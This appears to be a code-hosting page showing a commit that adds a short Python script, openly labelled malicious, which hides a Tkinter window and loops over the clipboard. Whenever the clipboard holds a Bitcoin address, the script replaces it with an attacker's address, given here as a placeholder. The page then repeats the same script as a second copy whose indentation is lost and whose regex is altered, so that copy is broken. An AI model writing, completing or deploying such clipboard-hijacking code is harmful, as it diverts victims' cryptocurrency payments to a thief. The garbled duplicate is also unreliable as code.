spicesouls · April 6, 2021 16:09
diff --git a/BitcoinAddressClipboardReplacer.py b/BitcoinAddressClipboardReplacer.py
 # This malicious script detects Bitcoin addresses in the clipboard and replaces them with the attacker's Bitcoin address.

 import re
 import tkinter as tk

 ATTACKERS_BTC_ADDRESS = 'XXXXXXXXXXXXXXX'
 REGEX = "^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$" # Bitcoin Address Regex

 root = tk.Tk()
 root.withdraw() # Disable any visible Tkinter windows coming up

 while True:
        clipboard = root.clipboard_get() # Get clipboard contents
        if ATTACKERS_BTC_ADDRESS in clipboard: # Check if the Attacker's Address is already being used.
                pass
        else:
                x = re.findall(REGEX, clipboard) # Check if the clipboard's contents is a single bitcoin address.
                if len(x) > 0:
                        root.clipboard_clear()
                        root.clipboard_append(ATTACKERS_BTC_ADDRESS) # Replace the clipboard's contents with the Attacker's BTC Address
	# This malicious script detects Bitcoin addresses in the clipboard and replaces them with the attacker's Bitcoin address.

	import re
	import tkinter as tk

	ATTACKERS_BTC_ADDRESS = 'XXXXXXXXXXXXXXX'
	REGEX = "^(bc1\|[13])[a-zA-HJ-NP-Z0-9]{25,39}$" # Bitcoin Address Regex

	root = tk.Tk()
	root.withdraw() # Disable any visible Tkinter windows coming up

	while True:
	clipboard = root.clipboard_get() # Get clipboard contents
	if ATTACKERS_BTC_ADDRESS in clipboard: # Check if the Attacker's Address is already being used.
	pass
	else:
	x = re.findall(REGEX, clipboard) # Check if the clipboard's contents is a single bitcoin address.
	if len(x) > 0:
	root.clipboard_clear()
	root.clipboard_append(ATTACKERS_BTC_ADDRESS) # Replace the clipboard's contents with the Attacker's BTC Address